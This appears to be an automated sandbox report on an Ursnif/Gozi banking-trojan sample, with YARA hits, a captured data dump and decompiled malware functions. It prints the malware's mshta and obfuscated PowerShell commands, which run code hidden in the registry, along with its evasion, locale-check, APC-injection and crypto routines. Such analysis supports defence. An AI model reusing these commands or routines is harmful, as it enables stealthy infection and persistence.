e9 c9 f7 43 d8 11 03 3a ce f4 9f ff 0b 8c 01 cc dc d4 eb eb a7 72 98 c6 24 7c 3d f1 0f e9 87 46 b3 75 3a d5 b4 33 32 49 4e 79 a2 ca f7 88 b2 54 df b0 0d 92 36 16 16 dd 53 5f 4e 22 0a 91 1b e7 06 31 3d 01 11 58 8e 4b 2b 07 f0 ec a0 4f cd f0 67 c2 6c 6f 2a 62 3e 9e 94 36 a4 fe 9a 75 bb 2e eb e3 87 6d 89 df b2 4e 70 76 90 8c b8 04 da a0 75 a2 4b 51 0f 35 bd c9 93 0d 6e 28 78 3b 1c 16 3e d0 c4 af 0d 22 2c 77 dd 2f 88 c6 33 b0 fe 47 
15 ad 2f 0e 53 62 b3 29 a4 d6 a3 43 73 70 c7 98 65 2e c3 f6 1d 1b 38 16 42 c1 25 70 6f 6b b5 ef e0 ac c5 af bf f8 ec 81 36 ce 61 cd 03 42 e2 63 ee 1f 57 7b 11 10 14 4b af 45 b6 97 57 45 c5 61 e2 c1 df 75 dc 09 bb 72 b9 4e a0 0b 3b 1f 71 74 6a dd 1f 82 1c c7 1a e3 dd 27 2e 5e 6a a1 ba 6a 87 d1 f5 a9 37 d8 7a 15 66 77 68 f7 a7 6e 1a f2 bd 81 d7 98 73 41 33 0a e2 11 fe b9 78 36 5f 26 62 e7 73 fd b7 94 f8 69 8a a6 86 2e c7 1a 79 ac 11 64 31 38 0c 66 1f c4 f3 ad 17 26 d7 5d c9 69 64 66 f7 47 c0 59 72 5a c4 da c4 3e b7 f7 1e ed 72 87 d2 23 fa d5 3f b7 5d 65 b1 b4 c2 62 7b dc 7d 80 e5 ca 48 7c 4e ac 6d 69 6d 01 20 5f 0d fc 75 39 7c 93 11 62 a6 51 ae 37 90 bf 89 1e 5f 55 86 25 14 cc eb 38 5f 6e 7d b3 6e 60 3b 60 2e 7a 0f 98 4b 22 34 51 31 1f d9 0d 79 15 52 48 f8 34 e6 44 90 e7 c2 70 fd ab 81 00 aa 51 a8 90 93 65 06 70 da c3 95 6c 21 56 05 92 33 0c ab 48 ac cd 06 33 ce
                          Data Ascii: ,"}4V2|pzd'PV^I8?1\uS8 2"sMF'gR7,FG]"4Zz%\] E*<}"IFMi0Ig?GLd==WS9_BZ0vftM``@D89<lW24%</*PS#a#MC,Nc2`De*KX^Ns-b.!f.A}_U+(-HwzRqs8%12#;":>EiQcOlc%G*1O(u5@0x|.csP:=Lv~Xt+{I4}]-9?WmeT`*j?18[2hsu~gp.N.f@>?C:r$|=Fu:32INyT6S_N"1=XK+Oglo*b>6u.mNpvuKQ5n(x;>",w/3G/Sb)Cspe.8B%pok6aBcW{KEWEaurN;qtj'.^jj7zfwhnsA3x6_&bsi.yd18f&]idfGYrZ>r#?]eb{}H|Nmim _u9|bQ7_U%8_n}n`;`.zK"4Q1yRH4DpQepl!V3H3


Target ID: 0
Start time: 02:13:00
Start date: 16/11/2022
Path: C:\Users\user\Desktop\main.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\main.exe
Imagebase: 0x400000
File size: 37888 bytes
MD5 hash: 9676298F24C8CDD4B532AC027A00F60E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.507621836.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.484013460.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low

Target ID: 14
Start time: 02:14:57
Start date: 16/11/2022
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>W6wy='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W6wy).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase: 0x7ff7e7b90000
File size: 14848 bytes
MD5 hash: 197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 15
Start time: 02:14:59
Start date: 16/11/2022
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([System.Text.Encoding]::ASCII.GetString((fuuocwpse "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase: 0x7ff6ce4b0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: false
Has administrator privileges: false
Programmed in: .Net C# or VB.NET
Reputation: high

Target ID: 16
Start time: 02:14:59
Start date: 16/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

                            Control-flow Graph

                            C-Code - Quality: 85%
                            			E00401493() {
                            				long _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v40;
                            				long _t28;
                            				long _t31;
                            				signed short _t33;
                            				void* _t37;
                            				long _t40;
                            				long _t41;
                            				void* _t48;
                            				intOrPtr _t50;
                            				signed int _t57;
                            				signed int _t58;
                            				long _t63;
                            				long _t65;
                            				intOrPtr _t66;
                            				void* _t71;
                            				void* _t75;
                            				signed int _t77;
                            				signed int _t78;
                            				void* _t82;
                            				intOrPtr* _t83;
                            
                            				_t28 = E004012B0();
                            				_v8 = _t28;
                            				if(_t28 != 0) {
                            					return _t28;
                            				}
                            				do {
                            					_t77 = 0;
                            					_v12 = 0;
                            					_t63 = 0x30;
                            					do {
                            						_t71 = E0040181A(_t63);
                            						if(_t71 == 0) {
                            							_v8 = 8;
                            						} else {
                            							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
                            							_t67 = _t57;
                            							_t58 = _t57 & 0x0000ffff;
                            							_v8 = _t58;
                            							if(_t58 == 4) {
                            								_t63 = _t63 + 0x30;
                            							}
                            							_t78 = 0x13;
                            							_t10 = _t67 + 1; // 0x1
                            							_t77 =  *_t71 % _t78 + _t10;
                            							E0040147E(_t71);
                            						}
                            					} while (_v8 != 0);
                            					_v8 = E0040164B(_t77);
                            					Sleep(_t77 << 4); // executed
                            					_t31 = _v8;
                            				} while (_t31 == 0x15);
                            				if(_t31 != 0) {
                            					L30:
                            					return _t31;
                            				}
                            				_v12 = 0;
                            				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
                            				if(_t33 == 0) {
                            					__imp__GetSystemDefaultUILanguage();
                            					_t67 =  &_v12;
                            					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                            				}
                            				if(_v12 == 0x5552) {
                            					L28:
                            					_t31 = _v8;
                            					if(_t31 == 0xffffffff) {
                            						_t31 = GetLastError();
                            					}
                            					goto L30;
                            				} else {
                            					if(E00401151(_t67,  &_v16) != 0) {
                            						 *0x403178 = 0;
                            						L20:
                            						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x403180, 0, 0); // executed
                            						_t82 = _t37;
                            						if(_t82 == 0) {
                            							L27:
                            							_v8 = GetLastError();
                            							goto L28;
                            						}
                            						_t40 = QueueUserAPC(E004011F6, _t82,  &_v40); // executed
                            						if(_t40 == 0) {
                            							_t65 = GetLastError();
                            							TerminateThread(_t82, _t65);
                            							CloseHandle(_t82);
                            							_t82 = 0;
                            							SetLastError(_t65);
                            						}
                            						if(_t82 == 0) {
                            							goto L27;
                            						} else {
                            							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                            							_v8 = _t41;
                            							if(_t41 == 0) {
                            								GetExitCodeThread(_t82,  &_v8);
                            							}
                            							CloseHandle(_t82);
                            							goto L28;
                            						}
                            					}
                            					_t66 = _v16;
                            					_t83 = __imp__GetLongPathNameW;
                            					_t48 =  *_t83(_t66, 0, 0); // executed
                            					_t75 = _t48;
                            					if(_t75 == 0) {
                            						L18:
                            						 *0x403178 = _t66;
                            						goto L20;
                            					}
                            					_t22 = _t75 + 2; // 0x2
                            					_t50 = E0040181A(_t75 + _t22);
                            					 *0x403178 = _t50;
                            					if(_t50 == 0) {
                            						goto L18;
                            					}
                            					 *_t83(_t66, _t50, _t75); // executed
                            					E0040147E(_t66);
                            					goto L20;
                            				}
                            			}

                            Instruction addresses of the decompiled lines above (source order, one per line of C code):
                            0x00401499 0x0040149e 0x004014a3 0x0040164a 0x0040164a 0x004014ac 0x004014ac 0x004014b0 0x004014b3 0x004014b4
                            0x004014ba 0x004014be 0x004014f5 0x004014c0 0x004014c8 0x004014ce 0x004014d0 0x004014d5 0x004014db 0x004014dd
                            0x004014dd 0x004014e4 0x004014ea 0x004014ea 0x004014ee 0x004014ee 0x004014fc 0x0040150c 0x0040150f 0x00401515
                            0x00401518 0x00401521 0x00401646 0x00000000 0x00401648 0x00401534 0x00401537 0x0040153f 0x00401541 0x0040154c
                            0x00401554 0x00401554 0x00401562 0x00401638 0x00401638 0x0040163e 0x00401640 0x00401640 0x00000000 0x00401568
                            0x00401573 0x004015b1 0x004015b7 0x004015c9 0x004015cf 0x004015d3 0x0040162f 0x00401635 0x00000000 0x00401635
                            0x004015df 0x004015ed 0x004015f5 0x004015f9 0x00401600 0x00401603 0x00401605 0x00401605 0x0040160d 0x00000000
                            0x0040160f 0x00401612 0x00401618 0x0040161d 0x00401624 0x00401624 0x0040162b 0x00000000 0x0040162b 0x0040160d
                            0x00401575 0x0040157a 0x00401581 0x00401583 0x00401587 0x004015a9 0x004015a9 0x00000000 0x004015a9 0x00401589
                            0x0040158e 0x00401593 0x0040159a 0x00000000 0x00000000 0x0040159f 0x004015a2 0x00000000 0x004015a2

                            APIs
                              • Part of subcall function 004012B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
                              • Part of subcall function 004012B0: GetVersion.KERNEL32 ref: 004012CE
                              • Part of subcall function 004012B0: GetCurrentProcessId.KERNEL32 ref: 004012EA
                              • Part of subcall function 004012B0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303
                              • Part of subcall function 0040181A: HeapAlloc.KERNEL32(00000000,?,004014BA,00000030,?,00000000), ref: 00401826
                            • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004014C8
                            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 0040150F
                            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401537
                            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401541
                            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401554
                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401581
                            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 0040159F
                            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004015C9
                            • QueueUserAPC.KERNELBASE(004011F6,00000000,?,?,00000000), ref: 004015DF
                            • GetLastError.KERNEL32(?,00000000), ref: 004015EF
                            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004015F9
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401600
                            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401605
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401612
                            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401624
                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 0040162B
                            • GetLastError.KERNEL32(?,00000000), ref: 0040162F
                            • GetLastError.KERNEL32(?,00000000), ref: 00401640
                            Memory Dump Source
                            • Source File: 00000000.00000002.505462084.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.505438679.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505483863.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505504174.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.505525978.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_main.jbxd
                            Similarity
                            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                            • String ID:
                            • API String ID: 520738550-0
                            • Opcode ID: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
                            • Instruction ID: af16b420b445b8790a0e43c51f3fc8c451078355e8a2a53fe19e92f811f25c67
                            • Opcode Fuzzy Hash: fda34ba359e64ccf93289e306a0c7ba5ae66b60962868661fcd4dfbef77cc745
                            • Instruction Fuzzy Hash: 3C51C671900614BBD721AFA58E88DAF7A7CEB44314F144137FA01F72E0D7788A01CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 87 6d47e5-6d4825 CryptAcquireContextW 88 6d497c-6d4982 GetLastError 87->88 89 6d482b-6d4867 memcpy CryptImportKey 87->89 90 6d4985-6d498c 88->90 91 6d486d-6d487f CryptSetKeyParam 89->91 92 6d4967-6d496d GetLastError 89->92 94 6d4885-6d488e 91->94 95 6d4953-6d4959 GetLastError 91->95 93 6d4970-6d497a CryptReleaseContext 92->93 93->90 97 6d4896-6d48a3 call 6d7a71 94->97 98 6d4890-6d4892 94->98 96 6d495c-6d4965 CryptDestroyKey 95->96 96->93 102 6d48a9-6d48b2 97->102 103 6d494a-6d4951 97->103 98->97 100 6d4894 98->100 100->97 104 6d48b5-6d48bd 102->104 103->96 105 6d48bf 104->105 106 6d48c2-6d48df memcpy 104->106 105->106 107 6d48fa-6d4909 CryptDecrypt 106->107 108 6d48e1-6d48f8 CryptEncrypt 106->108 109 6d490f-6d4911 107->109 108->109 110 6d4921-6d492c GetLastError 109->110 111 6d4913-6d491d 109->111 113 6d492e-6d493e 110->113 114 6d4940-6d4948 call 6d789e 110->114 111->104 112 6d491f 111->112 112->113 113->96 114->96
                            C-Code - Quality: 58%
                            			E006D47E5(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                            				int _v8;
                            				long* _v12;
                            				int _v16;
                            				BYTE* _v20;
                            				long* _v24;
                            				void* _v39;
                            				char _v40;
                            				void _v56;
                            				int _v60;
                            				intOrPtr _v64;
                            				void _v67;
                            				char _v68;
                            				void* _t61;
                            				int _t68;
                            				signed int _t76;
                            				int _t79;
                            				int _t81;
                            				int _t85;
                            				long _t86;
                            				int _t90;
                            				signed int _t94;
                            				int _t101;
                            				BYTE* _t102;
                            				int _t103;
                            				void* _t104;
                            				void* _t105;
                            				void* _t106;
                            
                            				_t103 = __eax;
                            				_t94 = 6;
                            				_v68 = 0;
                            				memset( &_v67, 0, _t94 << 2);
                            				_t105 = _t104 + 0xc;
                            				asm("stosw");
                            				asm("stosb");
                            				_v40 = 0;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosw");
                            				asm("stosb");
                            				_t61 =  *0x6da0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                            				if(_t61 == 0) {
                            					_a8 = GetLastError();
                            				} else {
                            					_t101 = 0x10;
                            					memcpy( &_v56, _a8, _t101);
                            					_t106 = _t105 + 0xc;
                            					_v60 = _t101;
                            					_v67 = 2;
                            					_v64 = 0x660e;
                            					_v68 = 8;
                            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                            					if(_t68 == 0) {
                            						_a8 = GetLastError();
                            					} else {
                            						_push(0);
                            						_push( &_v40);
                            						_push(1);
                            						_push(_v12);
                            						if( *0x6da0e4() == 0) {
                            							_a8 = GetLastError();
                            						} else {
                            							_t18 = _t103 + 0xf; // 0x10
                            							_t76 = _t18 & 0xfffffff0;
                            							if(_a4 != 0 && _t76 == _t103) {
                            								_t76 = _t76 + _t101;
                            							}
                            							_t102 = E006D7A71(_t76);
                            							_v20 = _t102;
                            							if(_t102 == 0) {
                            								_a8 = 8;
                            							} else {
                            								_v16 = 0;
                            								_a8 = 0;
                            								while(1) {
                            									_t79 = 0x10;
                            									_v8 = _t79;
                            									if(_t103 <= _t79) {
                            										_v8 = _t103;
                            									}
                            									memcpy(_t102, _a12, _v8);
                            									_t81 = _v8;
                            									_a12 = _a12 + _t81;
                            									_t103 = _t103 - _t81;
                            									_t106 = _t106 + 0xc;
                            									if(_a4 == 0) {
                            										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                            									} else {
                            										_t85 =  *0x6da0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                            									}
                            									if(_t85 == 0) {
                            										break;
                            									}
                            									_t90 = _v8;
                            									_v16 = _v16 + _t90;
                            									_t102 =  &(_t102[_t90]);
                            									if(_t103 != 0) {
                            										continue;
                            									} else {
                            										L17:
                            										 *_a16 = _v20;
                            										 *_a20 = _v16;
                            									}
                            									goto L21;
                            								}
                            								_t86 = GetLastError();
                            								_a8 = _t86;
                            								if(_t86 != 0) {
                            									E006D789E(_v20);
                            								} else {
                            									goto L17;
                            								}
                            							}
                            						}
                            						L21:
                            						CryptDestroyKey(_v12);
                            					}
                            					CryptReleaseContext(_v24, 0);
                            				}
                            				return _a8;
                            			}
                            Instruction addresses of the decompiled lines above (source order, one per line of C code):
                            0x006d47ee 0x006d47f4 0x006d47f7 0x006d47fd 0x006d47fd 0x006d47ff 0x006d4801 0x006d4804 0x006d480a 0x006d480b
                            0x006d480c 0x006d4812 0x006d4817 0x006d481d 0x006d4825 0x006d4982 0x006d482b 0x006d482d 0x006d4836 0x006d483b
                            0x006d484d 0x006d4850 0x006d4854 0x006d485b 0x006d485f 0x006d4867 0x006d496d 0x006d486d 0x006d486d 0x006d4871
                            0x006d4872 0x006d4874 0x006d487f 0x006d4959 0x006d4885 0x006d4885 0x006d4888 0x006d488e 0x006d4894 0x006d4894
                            0x006d489c 0x006d489e 0x006d48a3 0x006d494a 0x006d48a9 0x006d48af 0x006d48b2 0x006d48b5 0x006d48b7 0x006d48b8
                            0x006d48bd 0x006d48bf 0x006d48bf 0x006d48c9 0x006d48ce 0x006d48d1 0x006d48d4 0x006d48d6 0x006d48df 0x006d4909
                            0x006d48e1 0x006d48f2 0x006d48f2 0x006d4911 0x00000000 0x00000000 0x006d4913 0x006d4916 0x006d4919 0x006d491d
                            0x00000000 0x006d491f 0x006d492e 0x006d4934 0x006d493c 0x006d493c 0x00000000 0x006d491d 0x006d4921 0x006d4927
                            0x006d492c 0x006d4943 0x00000000 0x00000000 0x00000000 0x006d492c 0x006d48a3 0x006d495c 0x006d495f 0x006d495f
                            0x006d4974 0x006d4974 0x006d498c

                            APIs
                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,006D44FD,00000001,006D3831,00000000), ref: 006D481D
                            • memcpy.NTDLL(006D44FD,006D3831,00000010,?,?,?,006D44FD,00000001,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740), ref: 006D4836
                            • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 006D485F
                            • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 006D4877
                            • memcpy.NTDLL(00000000,7491C740,014A9600,00000010), ref: 006D48C9
                            • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,014A9600,00000020,?,?,00000010), ref: 006D48F2
                            • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,014A9600,?,?,00000010), ref: 006D4909
                            • GetLastError.KERNEL32(?,?,00000010), ref: 006D4921
                            • GetLastError.KERNEL32 ref: 006D4953
                            • CryptDestroyKey.ADVAPI32(00000000), ref: 006D495F
                            • GetLastError.KERNEL32 ref: 006D4967
                            • CryptReleaseContext.ADVAPI32(?,00000000), ref: 006D4974
                            • GetLastError.KERNEL32(?,?,?,006D44FD,00000001,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D497C
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                            • String ID:
                            • API String ID: 1967744295-0
                            • Opcode ID: 99d6a6c152ea29306c40c00b7c89099ab98eb27968327d4cc2ce131e42774a9b
                            • Instruction ID: c10c1f4ada3639c86d0bef273988360d7399739814497ad30a3f91178ee548f9
                            • Opcode Fuzzy Hash: 99d6a6c152ea29306c40c00b7c89099ab98eb27968327d4cc2ce131e42774a9b
                            • Instruction Fuzzy Hash: 57513971D04249BFDB10DFA5DC88AEEBBBAEB44350F14842AF915EA350DB708E14DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 216 401a49-401aa0 GetSystemTimeAsFileTime _aulldiv _snwprintf 217 401aa2 216->217 218 401aa7-401ac0 CreateFileMappingW 216->218 217->218 219 401ac2-401acb 218->219 220 401b0a-401b10 GetLastError 218->220 222 401adb-401ae9 MapViewOfFile 219->222 223 401acd-401ad4 GetLastError 219->223 221 401b12-401b18 220->221 224 401af9-401aff GetLastError 222->224 225 401aeb-401af7 222->225 223->222 226 401ad6-401ad9 223->226 224->221 227 401b01-401b08 CloseHandle 224->227 225->221 226->227 227->221
                            C-Code - Quality: 69%
                            			E00401A49(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                            				intOrPtr _v12;
                            				struct _FILETIME* _v16;
                            				short _v60;
                            				struct _FILETIME* _t14;
                            				intOrPtr _t15;
                            				long _t18;
                            				void* _t19;
                            				void* _t22;
                            				intOrPtr _t31;
                            				long _t32;
                            				void* _t34;
                            
                            				_t31 = __edx;
                            				_t14 =  &_v16;
                            				GetSystemTimeAsFileTime(_t14);
                            				_push(0x192);
                            				_push(0x54d38000);
                            				_push(_v12);
                            				_push(_v16);
                            				L00401FFA();
                            				_push(_t14);
                            				_v16 = _t14;
                            				_t15 =  *0x403184;
                            				_push(_t15 + 0x40405e);
